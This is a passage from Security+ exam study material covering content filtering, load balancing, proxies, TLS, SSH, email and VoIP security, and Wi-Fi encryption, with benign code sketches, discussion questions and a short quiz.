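    # Hypothetical content filter combining an address blocklist with keyword rules.
    BLOCKED_DOMAINS = {"malware.example", "gambling.example"}        # placeholder domains
    BLOCKED_KEYWORDS = ("win a free prize", "confidential wire transfer")

    def filter_request(domain, page_text):
        if domain in BLOCKED_DOMAINS:
            return "block: domain on blocklist"
        text = page_text.lower()
        if any(keyword in text for keyword in BLOCKED_KEYWORDS):
            return "block: content matched a filtering rule"
        return "allow"

    print(filter_request("news.example", "Today's headlines..."))
    print(filter_request("lottery.example", "Click here to WIN A FREE PRIZE now!"))
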
Content filters are sometimes part of network firewalls, but they're frequently combined with proxy servers or
web application firewalls that are already specialized to handle web traffic. Combination devices of this type
are commonly called web security gateways, and can be used to protect web users on your network from
malicious internet sites.

Load balancing
It's not always easy to increase network capacity to overcome a bottleneck, especially on larger, busier
networks. Eventually upgrading to something faster just isn't a convenient or affordable option, no matter how
important the service is. At that point, you need to share the workload between multiple slower components.
If you do it right, this sort of load balancing has the added benefit of increased reliability, ensuring that failure
of one redundant component will only hurt performance rather than cause network failures.

Exam Objective: CompTIA SY0-501 3.2.4.9


One way to do this is by distributing heavily used services over multiple devices: not only can you host
different services on different servers, sometimes even different components of one service (like an authentication server) are designed to be distributed between different hardware devices. You can even
segment networks and split services up by department if you need to.
When those aren't ideal, another option is to use load balancing appliances, hardware or software devices
designed to transparently combine distributed services into a single virtual whole. Channel bonding is one
example: if upgrading that overloaded trunk line to a faster Ethernet standard isn't feasible, you can combine
multiple physical interfaces into one virtual line. Load balancing routers can be used to split traffic over
multiple routes depending on congestion conditions. Load balancing is even possible for servers by means of
a content switch, a higher layer router that uses NAT to split server requests between multiple identical servers
that share a single virtual IP address. For example, if you need three physical web servers to handle your
traffic load, you could use a content switch to make them look like a single server to the outside network.

Load balancing devices can perform a variety of functions, all designed to distribute elements of one logical
service out among multiple physical devices, or to increase redundancy and availability.
• SSL acceleration moves the processing overhead associated with SSL or TLS encryption to another server, or to a hardware appliance with accelerated encryption features.
• Data compression uses standard compression methods to reduce the bandwidth required by some kinds of data traffic.
• Health checking tracks the functionality of each server in the load balancing pool, removing it in case of failure.
• TCP offloading and TCP buffering move resource-intensive TCP services to different servers than those performing server application functions.
• Priority queuing, much like QoS, allows some traffic to be given priority over others.
• Content caching allows the balancer itself to store the most frequently accessed content without contacting the servers behind it.

As you might be able to guess, the functions a load balancer has to perform already make it a natural place to
add additional security features, such as web application firewalls, IDS/IPS, and other protections.

Load balancer configurations


Load balancing is a great way to achieve high performance and high availability, but it adds a lot of
complexities to what might otherwise be a straightforward network service. Exactly what they are depends on
exactly what you're load balancing, but for an example imagine that you're load-balancing a high-volume web
application across multiple redundant servers.

Exam Objective: CompTIA SY0-501 2.1.7


The first question is that of scheduling. You want to make sure that incoming connections are spread evenly
across the servers without overloading any one of them. While it's technically possible to query each server to see which has the least load, that's complicated and generates traffic, so it's generally easiest to choose some
automated method. When you receive a connection you could randomly choose a server, or assign them in
round robin order. If your servers have different capacity, you can weight the algorithm to make sure more
powerful servers receive a larger workload.

Note: Round robin scheduling in particular is often implemented at the DNS level, with multiple server
IP addresses associated with the same server name. Whenever someone requests the load-balanced
server's name from the round robin DNS, it responds with the next IP address in the list.
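
Weighted round robin is simple enough to sketch directly; the pool members and weights below are placeholders, and a real balancer would interleave weighted servers more evenly.

    import itertools

    # Hypothetical weighted round-robin scheduler for a load-balancing pool.
    POOL = {"web1": 1, "web2": 1, "web3": 3}   # web3 is more powerful, so weight it higher

    # Expand the pool according to weight, then cycle through it indefinitely.
    rotation = itertools.cycle([srv for srv, weight in POOL.items() for _ in range(weight)])

    for _ in range(6):
        print(next(rotation))   # web1, web2, web3, web3, web3, web1, ...
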
Once you have scheduling set up for new connections there's another problem. Most web applications are
session-oriented, but HTTP itself is a stateless protocol. Every time the same user sends another
request to the server, the server sees it as a whole new communication. On a single server this is solved by
tools like session cookies, but those don't work very well if the load balancer sends the next request to a
different server that's genuinely never heard from that user before. The load balancer needs a method to allow
"sticky" sessions that always go to the same server, regardless of whether it's next in line or not.

IP affinity The load balancer tracks ongoing sessions based on the source IP address, and always routes
their requests to the same server. It's easy to track, but has some limitations such as mobile
clients that change IP addresses as they switch network connections.
Persistence The load balancer uses session cookies to track ongoing sessions regardless of IP address. It
might use the session cookie from the web server, or might issue one of its own.
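
IP affinity can be approximated by hashing the client address so the same source always maps to the same pool member. A minimal sketch (with a placeholder server list) follows; note that it shares IP affinity's weakness when clients change addresses.

    import hashlib

    # Hypothetical IP-affinity mapping: the same client IP always hits the same server.
    SERVERS = ["web1", "web2", "web3"]   # placeholder pool members

    def server_for(client_ip):
        digest = hashlib.sha256(client_ip.encode()).digest()
        return SERVERS[digest[0] % len(SERVERS)]

    print(server_for("203.0.113.10"))   # always the same server for this address
    print(server_for("203.0.113.10"))
    print(server_for("198.51.100.7"))   # a different client may map elsewhere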

Finally, one of the main benefits of using load balancing is to achieve higher availability than a single server
can provide. If one fails, the others are available. There are two main ways to achieve this.

Active-active All redundant servers (or other resources) are constantly available and sharing the load. If
one fails, its workload is distributed to remaining nodes. This is the usual load-balancing
approach, but it only works if there is enough excess capacity to compensate for failed
nodes. If a critical server crash overloads other servers, it might cause a cascading failure.
Active-passive In addition to any active nodes, there are one or more failover nodes that are left on standby
until an active node fails, then immediately are activated. Active-passive configurations
enforce excess capacity by leaving passive nodes deliberately idle until needed, and they can
also escape some network attacks that might compromise multiple active nodes at once, but
they require more additional hardware expense.

Proxy servers
Related to load balancers are proxy servers. A proxy server is an intermediary between a client and a server:
instead of the client contacting the server directly, it contacts the proxy server, which in turn contacts the
remote server. In return, the remote server communicates with the client through the proxy server. Often you
might see a proxy server on the perimeter network, mediating connections between the LAN and the Internet.

Exam Objective: CompTIA SY0-501 2.1.6, 3.2.4.5

• Forward proxies mediate communications between LAN clients and Internet servers, but require client-side configuration. They're often used on small, but heavily secured, networks.
• Transparent proxies operate like forward proxies, but don't require any special client configuration. They're more commonly used on large enterprise networks. They're sometimes called forced proxies, because the client doesn't choose whether to use them.
• Reverse proxies mediate communications between Internet clients and LAN servers.
• Anonymous proxies are usually hosted on the Internet, and mask the client's original IP address from the server.


It might seem like adding a middle man would hurt performance rather than help it. It's true that a proxy
server can be a potential bottleneck, but it can also serve many positive functions, among them performance
enhancement. Reverse proxies in particular are often part of load balancing solutions.
• Content caching of frequently accessed data
• Load balancing for internal servers
• Increased security or anonymity
• NAT functions
• Content filtering
• SSL offloading and decryption

Much like a load balancer, a proxy server is a natural place for combining security features in addition to
those they provide already. Reverse proxies have a lot of overlap with load balancers so the same options are
available. Forward proxies meanwhile can be enhanced with content filters and IDS/IPS designed to protect
local users from malicious internet content.

Unified threat management


Security is no exception to the trend of combining multiple related device functions into a single product,
whether to save equipment costs or reduce administrative overhead. New all-in-one solutions are often called next-gen firewalls or, for a less self-dating term, unified threat management (UTM) firewalls. UTM isn't a
concrete standard, but rather the concept of putting a complete network security solution into a single
centrally controlled system.


This means that a UTM appliance might have any combination of security features, or be customizable for
individual organizations.

Exam Objective: CompTIA SY0-501 2.4.9

• Firewall
• IDS
• IPS
• Content filtering
• Network-based antimalware
• DMZ interface
• NAT or proxy server
• VPN endpoint
• Network access control
• Posture assessment
• Industry-based regulatory compliance checking

Discussion: Application layer security


1. How do web application firewalls differ from ordinary firewalls?
Unlike an ordinary firewall, it's specialized to protect against attacks targeting web servers and
applications, such as forged HTTP requests, buffer overflows, SQL injection, and cross-site scripting.
2. Does your organization use any proxy servers?
Answers may vary.
3. What might content filters be used for?
Web content filters might be intended to keep users from accessing pornographic content or other
objectionable materials, while spam filters are used to block spam email messages before they arrive in
user inboxes.
4. What is the biggest difference between active-active and active-passive load balancing?
In active-active configurations, all nodes share the workload at all times; in active-passive configurations, one or more standby nodes stay idle until an active node fails.
5. If time allows, do a web search for UTM solutions.
Results may vary.

Assessment: Network security components


1. ACLs are based on which assumption? Choose the best response.
• Explicit Allow
• Explicit Deny
• Implicit Allow
• Implicit Deny

2. When configuring an IDS you might want to allow a few false positives to make sure you never get any false negatives, but not the opposite. True or false?
• True
• False


3. You're configuring a router, and want it to check the properties of incoming traffic before passing it on. What will this require? Choose the best response.
• Configuring ACLs
• Configuring routing tables
• Either would have the same effect
• Only a fully featured firewall can do this.

4. What kind of proxy would you use to mediate communications between Internet-based clients and LAN-based servers?
• Anonymous
• Forward
• Reverse
• Transparent

5. What DMZ topology is displayed? Choose the best response.

• Bastion Host
• Dual firewall
• Three-homed firewall
• UTM firewall

6. NIST defines the standards for UTM devices. True or false?

• True
• False

7. Which of the following is an example of a load balancer scheduling method? Choose the best response.
• Active-active
• Active-passive
• Round robin
• Virtual IP


Module B: Transport encryption


Older network protocols, and even some newer ones, can be very insecure. They might use weak encryption
or none at all, and authentication information like passwords, if included at all, might be poorly protected or
even transmitted as plaintext. To securely communicate over the network, you either need to replace these
protocols with newer and more secure alternatives, or augment their security on other layers of the network.
You will learn:

Cryptography and the OSI model


When many of the underlying protocols of today's networks were developed, security wasn't a big concern,
especially cryptographic security. There were a few reasons for this. One was that attacks were fewer and less
sophisticated, another that cryptography was computationally expensive and legally regulated, and a third was
that network engineers were too busy making networks reliably function in the first place. A lot of the tools of
modern cryptography weren't even in place: the core protocols of TCP/IP and Ethernet were both designed
before the principles of public key cryptography and cryptographic hashing were even published, and while
the DES cipher was still being developed and standardized. So while some protocols used passwords for
authentication, they were transmitted as plaintext, and while checksums were used for data integrity, they
weren't cryptographically secure.
Today the demands for cryptographic security are far higher, and there are common and widely available
tools to help guarantee confidentiality, integrity, and authenticity of data in transit. Secure protocols have been
designed that can replace insecure older ones, or at least protect their data. Unfortunately, networks have
evolved over time rather than been entirely replaced, so they still aren't designed for security from the ground
up. This means that increasing security while maintaining compatibility can be a real challenge, whether
you're introducing encryption in the first place or just switching to stronger methods.
Remember that the OSI model describes the network in terms of seven layers, each with its own set of roles
and the protocols needed to achieve them, and each encapsulating data used by protocols on higher layers.
Cryptographic security isn't tied to any particular layer; in theory you could apply it to any layer to protect
data on that level. You could even theoretically apply encryption at every layer, but compatibility concerns
aside that approach could greatly damage performance. In practice, networks more commonly apply
cryptographic protections where attack is most likely: to authentication processes, to particular types of
traffic, or on certain segments of the physical network.
That doesn't mean you can get the same effect from encrypting on any given layer: each has its own benefits
and drawbacks both in terms of what is secured, and the potential effects on compatibility and performance.
For instance, encryption used on the upper layers of the network, like the HTTPS protocol used by secure
websites, will selectively protect traffic using that protocol. The encryption needs to be supported by the
application software on both ends of the connection, but not necessarily by the underlying operating system
functions or network hardware: to them, application data is application data. If you wanted to apply this sort
of protection to multiple applications on the network, you'd need a secure protocol for each one, and
application software that knows how to use it.
On the other side, imagine encryption used on a lower layer of the network, like the WPA encryption used by
Wi-Fi access points. WPA protects all traffic that passes through the Wi-Fi network, regardless of whether it's
using a secured application protocol or not, so an eavesdropper couldn't steal your plaintext FTP password by
listening to your wireless signal. It even obfuscates what higher level protocols you're using, so the
eavesdropper can't necessarily even tell it's FTP traffic in the first place. This might sound better, but it has its
own drawbacks. Lower level encryption might be easier to break for an inside attacker connected to the same
secure network, and it might apply to only part of the network besides: in the case of Wi-Fi, the AP is
probably connected to an unencrypted Ethernet network, and data that travels onto the wired portion won't be
protected. There's no technical reason you couldn't apply similar encryption to Ethernet or any other Layer 2
standard, but every router and switch that handles data on that layer would need to have compatible protocols,
suitable credentials, and sufficient processing power to handle its existing workload.


There are a few other consequences to using cryptography on different network layers. Headers might need to
be left unencrypted so they can easily be read. Even integrity verification can be a problem with header fields
that might need to be changed in transit. Some networks might use traffic shapers or content filters that
operate by reading packet contents; if said contents are encrypted, traffic can be misdirected or even blocked,
even if a more "traditional" network wouldn't have been affected.

SSL and TLS


The most widespread standard for securing the upper layers of the network stack is Secure Sockets Layer
(SSL) along with its successor Transport Layer Security (TLS). Technically speaking, in the OSI model both
are classified as either Session (Layer 5) or Presentation (Layer 6) protocols, but their implementation often
extends up into the Application layer. The important thing is that they lie somewhere between application
protocols themselves and the Transport layer protocols used by the TCP/IP stack.

Exam Objective: CompTIA SY0-501 2.6.1.9


SSL was originally developed by Netscape as a way to add security beneath the HTTP protocol, and that's still
one of its most popular uses. SSL versions 1 and 2 contained serious security flaws and were quickly replaced
in 1996 by the final standard, SSL 3.0. While SSL 3.0 was eventually published as an IETF standard, today
it's considered cryptographically vulnerable and was officially deprecated in June 2015. SSL is still in
widespread use, but it's being replaced by TLS and shouldn't be used in new installations when possible.
In 1999 TLS 1.0 was introduced, with TLS 1.1 following in 2006 and 1.2 in 2008. It supports newer
encryption standards and fixes some other security issues. While the two aren't directly compatible, really
TLS can be seen as a further evolution of SSL: the name change was mostly to signify that it had become an
open standard rather than a proprietary Netscape project. As usual, users and even some documentation don't
care much about technicalities, so you'll still frequently see reference to "SSL" even on modern software that's
moved entirely to TLS, or you'll see the two used interchangeably. Inaccurate as it is, sometimes TLS 1.0 is
even called "SSL 3.1", or public key certificates are generically called "SSL certificates" even when they're
not used for SSL at all.
Both SSL and TLS use certificate based authentication to set up a key exchange between two parties, then use
symmetric encryption for the actual communications session. The encrypted session then continues until one
side or the other breaks the connection. At the minimum, one party needs to have a certificate to perform one-
way authentication; for example, when you connect to a SSL-secured website, the server's certificate allows
your browser to authenticate that the server is genuine, but if the server requires your identity you'll need a
password or some other authentication factor. SSL and TLS can also perform dual or two-way authentication,
where both the client and server must have a certificate to present to the other.

Cipher suites
Maintaining cryptographic security requires that all parties involved use compatible, and secure, algorithms.
Often a given protocol needs several at once. To establish a SSL session you need not only a public key cipher
for key exchange and a symmetric cipher for bulk encryption; you also need a hashing algorithm to validate
certificates and integrity checks, and a pseudorandom number generator to create session keys and nonces. A
given protocol could define exactly what algorithms to use, but that wouldn't be very flexible for different
users with different security needs, or easily keep up with the overall network's security needs changing over
time.
SSL and TLS allow flexibility by means of cipher suites, named combinations of supported algorithms for
each category, listed in order of preference. When two hosts establish a SSL connection, the client presents its
list of supported cipher suites, and the server chooses one of them.
A specific cipher suite consists of a complete combination of algorithms, and the server must use one cipher
suite as a whole rather than combining compatible algorithms from different suites. For example, if the
client's first choice of cipher suite and the server's use the same symmetric cipher, hash, and PRNG, but the
client wants to do key exchange using a Diffie-Hellman variant the server doesn't support, the server can't just
take the other algorithms and look for a better key exchange method in the client's list. Instead, it has to find a
cipher suite that entirely matches one of its own, even if all the other algorithms are different.


You can configure a host's list of cipher suites, and their order of preference. With the number of algorithms
of each category TLS allows there are hundreds of possible combinations, even if some are more likely than
others. To maximize security, you can certainly put especially strong combinations at the top of the list, but
for compatibility keep in mind what suites other hosts are likely to be using and include common, but
sufficiently secure, combinations. Even for the sake of backward compatibility, avoid including insecure suites: they open you to the possibility of downgrade attacks.
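
What this looks like in practice varies by product, but as one hedged example, Python's ssl module exposes the idea of an ordered, restricted cipher suite list. The OpenSSL-style filter string below is just an illustration, not a recommendation for any particular environment.

    import ssl

    # Sketch: restricting and ordering TLS cipher suites with Python's ssl module.
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2     # refuse SSL 3.0 and early TLS
    ctx.set_ciphers("ECDHE+AESGCM:!aNULL:!MD5")      # prefer forward-secret AES-GCM suites

    # Each entry names a complete combination of key exchange, authentication,
    # bulk cipher, and hash, e.g. ECDHE-RSA-AES256-GCM-SHA384.
    for suite in ctx.get_ciphers()[:5]:
        print(suite["name"])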

SSL applications
The most visible use of SSL/TLS, and in fact the most visible secure replacement for an older protocol in
general, is HTTP Secure (HTTPS), the standard used by secure websites. When you're using HTTPS, your
browser address bar starts with https:// instead of http://, and you'll see some sort of padlock icon or
green background showing that the site is secure and verified. The precise details depend on the browser
you're using and the type of certificate the site has. You can even click it for more info on the server
certificate.

Exam Objective: CompTIA SY0-501 2.6.1.6, 2.6.1.8, 2.6.1.10, 2.6.1.11, 2.6.2.3, 2.6.2.4

When there's a certificate problem with an HTTPS site, your browser will give some sort of warning. Usually
you'll first see a warning page, asking whether you want to continue. Even if you do, the address bar will
generally show some sort of error. At the least, this means the site isn't configured properly or has an outdated
certificate. It could also indicate further security problems, or even a fraudulent site.

For all that, HTTPS isn't really a new protocol; in fact, its syntax and functions are exactly like HTTP. The
difference is that the browser and server both pass HTTP traffic through SSL or TLS. For this reason, HTTPS
is also said to stand for HTTP over SSL, or HTTP over TLS. HTTPS traffic is kept separate from regular,
unencrypted HTTP traffic by using the different name, and also by using a different server port: 443 for
HTTPS vs. 80 for HTTP.
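
The handshake and certificate check that happen behind that padlock icon can be reproduced with a few lines of Python (the hostname is a placeholder, and this is a sketch rather than a hardened client):

    import socket, ssl

    # Sketch: open an HTTPS (HTTP over TLS) connection on port 443 and examine
    # the server certificate the browser would normally validate for you.
    hostname = "www.example.com"           # placeholder host
    ctx = ssl.create_default_context()     # verifies the certificate chain and hostname

    with socket.create_connection((hostname, 443)) as sock:
        with ctx.wrap_socket(sock, server_hostname=hostname) as tls:
            print(tls.version())                       # e.g., TLSv1.3
            cert = tls.getpeercert()
            print(cert["subject"], cert["notAfter"])   # certificate subject and expiry
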
HTTPS is the first and most widespread use of SSL, but it's not the only one. In theory, SSL/TLS can perform
authentication and encryption for any application layer protocol, and pass it on to any transport layer protocol.
This has made it a popular way to add security to otherwise insecure application protocols. Sometimes they're
explicitly named, for example FTPS is the FTP protocol run over SSL or TLS. Other times they're just
configuration options in the applications using them; insecure email protocols like SMTP, POP, and IMAP can
be secured if both client and server support SSL/TLS. Even when the naming isn't different, a server that
accepts both secure and insecure connections will commonly use different server ports for the two.


Since it's so popular and well-proven, sometimes SSL/TLS is even used as an alternative method for protocols
that have existing security measures, such as a way to add certificate-based authentication. While version 3 of
Simple Network Management Protocol (SNMP) includes encryption on its own, some variants use TLS.
Likewise, EAP-TLS applies TLS to the Extensible Authentication Protocol widely used in point-to-point and
wireless connections. SSL/TLS are even the foundation for some modern fully-featured VPN technologies.

SSL appliances
By and large SSL/TLS isn't very strenuous for modern computers, even using strong encryption. In fact, many
newer processors have support for AES acceleration functions so the symmetrical encryption has minimal
performance impact, and the most computationally expensive part is the initial key exchange. That said, there
are times when additional hardware devices or appliances are still desirable.

Exam Objective: CompTIA SY0-501 2.1.14, 2.1.15, 3.2.4.8


First, just because SSL has a low performance impact doesn't mean it has none. For high-volume servers it's
still beneficial to add SSL/TLS accelerators or more general hardware security modules in the form of add-on
cards or separate network devices. Offloading encryption/decryption to the specialized device takes stress off
the web or application server.
Second, sometimes you don't want to use encryption within a trusted network. The same features that make
SSL a powerful protection for private communications on untrusted networks make it possible for attackers
within a trusted network to spread malware or exfiltrate data without being noticed. It can even make it hard
to monitor and shape ordinary traffic for performance purposes. A solution to this problem is SSL decryptors
placed on network boundaries or other critical locations, which can open and inspect SSL/TLS traffic. Some
of these appliances are built into proxy servers, and others into firewalls. Either way, they function as a sort of
legitimate man-in-the-middle attack, serving as the local endpoint of the SSL connection. On the trusted
network, they may also set up a separate SSL connection with the internal host to prevent eavesdropping by
inside attackers.

SSL decryptors do have some technical, ethical, and legal issues. Technically speaking, it's important that the
proxy's own SSL certificate is registered on internal clients. Otherwise, they'll receive invalid certificate
warnings from outside sites. Ethically and legally, if your network policies allow personal internet access such
as private email or online banking, it's essential that your privacy policy spells out just what communications
can be intercepted and how users can expect that information to be protected.

Secure shell
Secure shell (SSH) has some similarities to SSL in name, purpose, and underlying technologies, but the two
are very distinct in origin, application, and other specifics. Like SSL, SSH was first used to apply security to
common protocols; originally, it was intended to replace telnet, rlogin, and other remote terminal applications
with weak authentication and no encryption. It also includes secure copy protocol (SCP), rsync, and SSH File
Transfer Protocol (SFTP) as replacements for older file transfer protocols. These protocols aren't just existing
protocols run through SSH tunnels—instead, they're designed from the ground up to replace the functionality
of those older protocols from within SSH. SSH uses TCP port 22.

Exam Objective: CompTIA SY0-501 2.6.1.2, 2.6.1.7

Note: SFTP specifically replaces FTP, but it shouldn't be confused with FTPS running over TLS. It's an
easy mistake to make since they have similar names, similar functions, and are sometimes both
supported by the same client applications.
SSH uses public key cryptography to authenticate connections. Some implementations rely on X.509
certificates verified through CAs, but unlike SSL other methods are readily supported. The original, and still-
supported, SSH authentication method relies on users to manually verify each other through an out-of-band
key exchange before creating a client-server connection for the first time.
In addition to its core application protocols, SSH can also be used as a tunneling protocol to carry a wide
variety of application data, or even create a VPN. It's primarily used to connect to Unix-like servers, but it's
available for Windows systems as well.
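
For a rough idea of how SSH's host-key model looks in practice, here's a sketch using the third-party Paramiko library (not part of the SSH standard itself; the hostname, username, and file paths are placeholders). It refuses unknown host keys, mirroring the out-of-band verification described above, and then transfers a file over SFTP instead of plain FTP.

    import os
    import paramiko   # third-party SSH library; assumed installed for this sketch

    client = paramiko.SSHClient()
    client.load_system_host_keys()                                # keys already verified out of band
    client.set_missing_host_key_policy(paramiko.RejectPolicy())   # refuse servers we haven't verified

    client.connect("server.example.com", port=22, username="admin",
                   key_filename=os.path.expanduser("~/.ssh/id_rsa"))

    sftp = client.open_sftp()
    sftp.put("report.txt", "/tmp/report.txt")    # encrypted file transfer replacing plain FTP
    sftp.close()
    client.close()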

Secured email
Securing and authenticating email is historically difficult, which is much of why it's traditionally seen as an
informal communication method. Security has greatly increased on modern systems, with improved server
authentication and SSL/TLS secured connections, but there are still vulnerabilities and not all systems support
strong security. In addition, those methods only really secure mail as it travels between client and server: the
email messages themselves are still just plaintext. This means an attacker can read or alter messages stored on
a compromised server, or transmitted insecurely between servers over the internet.

Exam Objective: CompTIA SY0-501 2.6.1.3


An alternative is to encrypt or digitally sign the contents of the email itself. As long as the sender and
recipient's clients both support the method used and the ciphertext is compatible with standard email
protocols, it doesn't matter what security measures are used in transit.
There are two main standards for securing email messages:

S/MIME Secure/Multipurpose Internet Mail Extensions adds public key encryption and signing to the
MIME format used by most email messages. S/MIME uses X.509 certificates distributed by a CA;
it's common to use separate private keys (and thus separate certificates) for encryption and
signing, so that the encryption key can be held in escrow without compromising the non-
repudiation ability of the signing key. Most modern clients support S/MIME, but since it requires
purchase and installation of certificates from a CA it's mostly used in enterprise environments with
high security needs.
PGP Pretty Good Privacy was developed by Phil Zimmermann in 1991 and was the first public-key
cryptography program available to the general public. In fact, at the time it led to a criminal
investigation of Zimmermann for breaking the very restrictive rules the US government had at the
time regarding strong encryption. PGP was originally designed for use on bulletin board services,
but was easily adapted to email and other applications. Since OpenPGP certificates use the web of
trust model, anyone can create them freely; as a result, PGP is the more popular choice for
encrypting email outside of enterprise environments.
Note: The original PGP software was freeware; today PGP itself is commercial
software owned by Symantec, but technically it uses the OpenPGP standard
supported by many vendors. GNU Privacy Guard is a popular free replacement.
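
As an illustration of the OpenPGP approach, the sketch below uses the third-party python-gnupg wrapper, which in turn calls a locally installed GnuPG binary. The recipient address is a placeholder, and the example assumes their public key has already been imported into the keyring. The resulting ASCII-armored ciphertext can be pasted into the body of an ordinary email message.

    import gnupg   # third-party wrapper around a locally installed GnuPG binary

    gpg = gnupg.GPG()   # uses the default keyring; assumes the recipient's public key is imported

    message = "Quarterly figures attached. Please keep confidential."
    encrypted = gpg.encrypt(message, "alice@example.com")   # encrypt to the recipient's public key

    if encrypted.ok:
        print(str(encrypted))     # ASCII-armored ciphertext, safe to send through plain SMTP
    else:
        print("Encryption failed:", encrypted.status)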

Secure VoIP
While VoIP-enabled PBX systems are extremely convenient, putting phone traffic on IP networks can make
attacking telephone systems easier than it has been since the 1970s era of phreaking with a line tap and tone
generator. A big part of this is that two of the most important protocols used for VoIP are insecure: Session
Initiation Protocol (SIP), which is used for establishing, managing, and ending communication sessions; and
Real-time Transport Protocol (RTP), which is used to carry the audio or video data itself. With no security features,
it's simple for an attacker to manipulate communication sessions or listen in on sensitive calls.

Exam Objective: CompTIA SY0-501 2.6.1.4, 2.6.2.1


To secure VoIP, you can use encryption extensions to insecure protocols.
 SIP can be secured using TLS. Since two-way authentication is important for a secure call, both client
and server must have certificates.
 RTP can be used with a security profile called Secure RTP (SRTP), which allows both AES encryption
and HMAC-SHA1 authentication.

Exercise: Examining website certificates


In this exercise, you'll view an SSL certificate in your web browser.
Do This How & Why

1. In the Windows 7 VM, open Firefox.

2. Navigate to www.google.com. Google automatically loads its page as HTTPS. The green
padlock shows that it's a verified certificate and the connection
is encrypted.

3. Examine the certificate on the page. You'll learn more about how the certificate was issued and
what protection it provides.

a) Point to the padlock icon. A tooltip appears saying that it's verified by Google, Inc.

b) Click the icon. A popup appears showing the certificate and site permissions.

c) Click the right arrow, then More Information. The Page Info window opens with the Security tab active.

d) Examine the Website Identity section. It gives the website name and the CA that issued and verified the
certificate. In this case, it's verified by Google's own CA.

e) Examine the Technical Details section. It lists the protocols being used by the connection. In this case,
the connection is encrypted using TLS 1.2 as the transport protocol, elliptic-curve Diffie-Hellman key
exchange, RSA key signing, AES-128 symmetric encryption, and SHA256 hashes. They're all strong
cryptographic protocols.

f) Examine the Privacy & History section. It doesn't relate directly to the certificate, but does list whether
you have any cookies or saved passwords for this site.

4. View the certificate itself.

a) Click View Certificate. The Certificate Viewer window appears.

b) Examine the General tab. It shows the valid uses for the certificate, who it was issued to, who it was
issued by, when it is valid, and its SHA1 and SHA-256 hashes.

c) Click the Details tab. It has three sections: Certificate Hierarchy, Certificate Fields,
and Field Value. It also has an Export button to save the
certificate as a file.

d) In the Certificate Fields section, click each field in turn. These are X.509 fields. As you click each, its
value appears in the bottom section.

e) Examine the Certificate Hierarchy section. www.google.com's certificate was issued by the Google
Internet Authority G2 intermediate CA. In turn, its certificate was issued by the GeoTrust Global CA.

f) Click GeoTrust Global CA. Each level has its own certificate that you can fully examine.

5. Close all open windows.

Wireless encryption
In contrast to SSL and its relatives and alternatives, the other most visible use of encrypted connections is on
802.11 Wi-Fi networks. While many Ethernet networks have little internal security for anyone who can
physically plug in, in the world of Wi-Fi even novice users learn to enable secure hotspots with strong
encryption and lengthy passwords. The reason why isn't that hard to guess: the nature of wireless signals
makes it difficult to achieve the sort of physical access control and network segmentation Ethernet has almost
by default.
Cryptographic security on Wi-Fi networks is handled at Layer 2 (Data Link) in the OSI model, so it behaves
very differently than upper level encryption like SSL. Since it applies to the Layer 2 frames themselves it
encrypts all data that passes over the network, but it's local rather than end to end; any higher level data
passing to a wired network or a different hotspot will use the security settings (or lack thereof) for that
network. Note that while frame payloads themselves are encrypted, the Layer 2 header is not: this means that
all connected MAC addresses as well as the network's SSID are readable to an eavesdropper no matter how
the network is secured.
Similarly, Wi-Fi security is handled by the hardware, firmware, and drivers of the wireless adapters and
access points themselves rather than the operating system or a separate software application. The particular
security settings used by the access point must be supported by any device wishing to connect to the network,
and the available ciphers and security settings are a fairly narrow set defined by the 802.11 Wi-Fi standards.
In practice, both of these limitations have advantages: some WAP settings allow simultaneous support of a
number of client standards, and many Wi-Fi devices use hardware-accelerated encryption so even strong
ciphers on slow devices won't impact performance.

Wi-Fi encryption standards


The security standards used for Wi-Fi make a good example of how security needs change over time, and how
seriously flawed encryption implementations can become widely adopted. In general, there are three available
encryption standards on modern Wi-Fi networks, though each has some internal options.

Exam Objective: CompTIA SY0-501 6.3.1

WEP Wired Equivalent Privacy was part of the original Wi-Fi standard. It uses the RC4 stream cipher,
and it soon turned out to have some major problems. First, due to export restrictions of the time its
default configuration was a 64-bit key: 24 bits of IV, 40 bits of actual encryption. Even at the time
this wasn't very strong. The stronger WEP-128 option gave an effective 104 bits of work factor in
theory, but weaknesses with the IV and other aspects of the protocol made it nearly as easy to
break. A skillful attack can compromise either variety of WEP in seconds, so while current devices
might still support it for compatibility reasons, it was removed from the Wi-Fi standard in 2004
and is never recommended for use.
WPA Wi-Fi Protected Access was included as part of the draft 802.11i standard, rushed a bit into service
when WEP's critical limitations became obvious. It was designed to run on the same hardware as
WEP, but with enhanced security. While most WPA devices support AES encryption, by default,
WPA encrypts traffic using Temporal Key Integrity Protocol (TKIP), a different implementation of
the RC4 cipher. Not only is the encryption key itself 128 bits, but it uses a different and more
secure initialization vector along with a 64-bit MIC, and each data packet is sent using its own key.
This protected it from the worst of the WEP attacks, but it still has some vulnerabilities. In practice,
WPA with TKIP isn't actually considered broken like WEP is, but it's vulnerable enough that AES
mode is preferred.

WPA2 WPA2 is the final version of WPA, based on the final 802.11i standard. It has a few changes, but
the biggest one is mandatory support for 128-bit AES-CCMP, which uses the AES cipher in Counter Mode
with CBC-MAC (the CCM mode of operation). AES was optional in many WPA devices, but not
required. Likewise, WPA2 devices usually allow TKIP as an option. Since there are no known
effective attacks against AES itself, WPA2 in AES-only mode is the strongest current encryption
standard for Wi-Fi.

WPA authentication
WPA and WPA2 offer three methods for authentication and key distribution.

Exam Objective: CompTIA SY0-501 6.3.3.1, 6.3.3.2

WPA-Personal Also called pre-shared key (PSK). Uses a 256-bit key manually distributed to each
authorized user. The key can be directly entered as 64 hexadecimal digits, or in the form
of an ASCII password between 8 and 63 characters. If the ASCII password is used, it's
hashed using the SSID as a salt to create the key itself (see the key-derivation sketch
after this table). WPA-Personal is convenient for small networks with few users, and if
the password is long and random enough and the SSID unusual, it's as secure as any
method. The downside is that all users share the same key: not only does the key need to
be changed if any one user is compromised, but the new key also needs to be manually
passed on to each user.
WPA-Enterprise Also known as 802.1x mode. Connecting clients are allowed to communicate only to an
external authentication server using EAP; by default EAP-TLS is used but a number of
other standards are supported, such as PEAP, EAP-TTLS, or various proprietary
protocols. Once clients are authenticated, they get full network access, but they never
directly see the WPA encryption key so they can't share it. WPA-Enterprise is more work
to set up, but since individual user credentials can be changed or removed, it's easier to
maintain and keep secure.
WPS Wi-Fi Protected Setup was designed to make it easy for non-technical users of home
networks to easily control network access. It's an addition to PSK mode, but also allows
the key to be shared with a new device by other methods like a PIN, a push-button
pairing mechanism, or NFC pairing. It's convenient, but it turned out to have a major
security flaw. The PIN method, which is a mandatory part of the standard, turned out to
